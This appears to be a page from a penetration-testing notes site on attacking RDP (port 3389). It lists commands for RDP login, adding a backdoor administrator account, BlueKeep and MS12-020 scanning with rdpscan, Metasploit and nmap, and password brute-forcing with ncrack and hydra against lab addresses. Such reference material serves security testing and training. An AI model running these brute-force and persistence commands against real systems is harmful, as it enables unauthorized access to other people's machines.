RDP 3389

1. RDP Login:

To login to a remote machine using RDP:

  • Using rdesktop (for older systems):

    rdesktop -u DISCO 10.11.1.13

  • Using xfreerdp (more modern, cross-platform):

    xfreerdp /u:admin /v:10.10.10.10 + clipboard

2. Add a User and Grant Privileges:

  • Create a User:

    net user redcliff password123 /add

  • Add the User to Administrator Group:

    net localgroup Administrators redcliff /add

  • Add the User to Remote Desktop Users Group:

    net localgroup "Remote Desktop Users" redcliff /ADD

3. RDP Vulnerability Scanning (BlueKeep):

  • Clone rdpscan Repository and run a scan:

    sudo git clone https://github.com/robertdavidgraham/rdpscan.git
./rdpscan 10.10.10.10

  • Scan for BlueKeep Vulnerability Using Metasploit: First, perform an Nmap scan to identify live RDP targets:

    nmap -p3389 -T5 <subnet>/24 -oG - | awk '/Up$/{print $2}' > rdp.lst

    Then use Metasploit to run the BlueKeep scanner:

    msfconsole
> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
> set RHOSTS file:<path to rdp.lst>
> run

4. Brute-Forcing RDP:

  • Brute-force RDP with ncrack:

    ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1
sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389

  • Brute-force RDP with hydra:

    hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13

5. Nmap RDP Enumeration Scripts:

  • RDP Service Enumeration:

    nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.11.1.1

  • Check for MS12-020 Vulnerability:

    nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11

6. Microsoft Terminal Services (MS-WBT-SERVER):

You can identify the MS Terminal Services (RDP) version and potential vulnerabilities using Nmap:

  • Scan for RDP Vulnerabilities (MS-WBT-SERVER):

    nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11

  • BlueKeep (CVE-2019-0708)

PreviousMySql 3306NextADB Android Debug Bridge 5555

Last updated